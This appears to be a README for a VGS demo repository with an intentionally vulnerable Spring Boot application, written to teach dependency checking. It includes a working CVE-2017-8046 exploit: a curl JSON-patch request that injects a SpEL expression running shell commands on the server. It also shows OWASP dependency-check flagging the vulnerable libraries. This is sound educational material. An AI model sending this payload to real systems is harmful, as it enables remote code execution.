<p align="center"><a href="https://www.verygoodsecurity.com/"><img src="https://avatars0.githubusercontent.com/u/17788525" width="128" alt="VGS Logo"></a></p>
_**DISCLAIMER:** This repository is supplementary to the VGS blog post,
[How to Avoid "Using Components with Known Vulnerabilities"](https://develop--vgsblog.netlify.com/posts/how-to-avoid-using-components-with-known-vulnerabilities/).
It contains an application with a known security vulnerability (namely,
[CVE-2017-8046](https://pivotal.io/security/cve-2017-8046)), as well as the
description of how to exploit it. Use the application at your own risk!_
## Setting Up
First, start the application by executing the following command from the root of the repository:
```bash
mvn clean spring-boot:run
```
Second, create a resource by sending a `POST` request like this:
```bash
curl -X POST http://localhost:8080/books \
-H 'Content-Type: application/json' \
-d '{"isbn":"978-3827268969","title":"Thinking in Java","author":"Bruce Eckel"}'
```
## Exploiting the Vulnerability
```bash
curl -X PATCH http://localhost:8080/books/1 -H 'Content-Type: application/json-patch+json' -d '[{"op":"replace","path":"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x","value":"Your application has been hacked"}]'
```
Provided you're running the application on a Unix-based operation system (e.g.
macOS), a response will contain the host's network configuration. In fact, any
[SpEL](https://docs.spring.io/spring/docs/current/spring-framework-reference/core.html#expressions)
expression can be used.
## Checking Vulnerable Dependencies
```bash
mvn clean package verify
```
The build will fail as there's a dependency identified with a high-risk
vulnerability:
```
[ERROR] Failed to execute goal org.owasp:dependency-check-maven:3.3.2:check (default) on project CVE-2017-8046:
[ERROR]
[ERROR] One or more dependencies were identified with vulnerabilities that have a CVSS score greater than or equal to '7.0':
[ERROR]
[ERROR] spring-boot-1.5.5.RELEASE.jar: CVE-2017-8046
[ERROR] spring-core-4.3.10.RELEASE.jar: CVE-2018-1275, CVE-2018-1270
[ERROR] jackson-databind-2.8.9.jar: CVE-2017-15095, CVE-2017-17485, CVE-2018-7489
[ERROR] spring-boot-starter-data-rest-1.5.5.RELEASE.jar: CVE-2018-1273, CVE-2017-8046
[ERROR]
[ERROR] See the dependency-check report for more details.
```
## What is VGS?
_**Want to just jump right in?** Check out our [getting started
guide](https://www.verygoodsecurity.com/docs/getting-started)._
Very Good Security (VGS) allows you to enhance your security standing while
maintaining the utility of your data internally and with third-parties. As an
added benefit, we accelerate your compliance certification process and help you
quickly obtain security-related compliances that stand between you and your
market opportunities.
To learn more, visit us at https://www.verygoodsecurity.com/
## License
This project is licensed under the MIT license. See the [LICENSE](LICENSE) file
for details.
[4.0K] /data/pocs/b3f77c5cdc1d7c7bbb6f6dea9a422017c3ca1e9d
├── [1.1K] LICENSE
├── [2.3K] pom.xml
├── [3.1K] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] verygoodsecurity
│ ├── [ 643] Application.java
│ └── [4.0K] domain
│ ├── [1.3K] AuditableEntity.java
│ ├── [ 879] Book.java
│ └── [4.0K] repository
│ └── [ 673] BookRepository.java
└── [4.0K] resources
└── [ 128] application.yml
8 directories, 8 files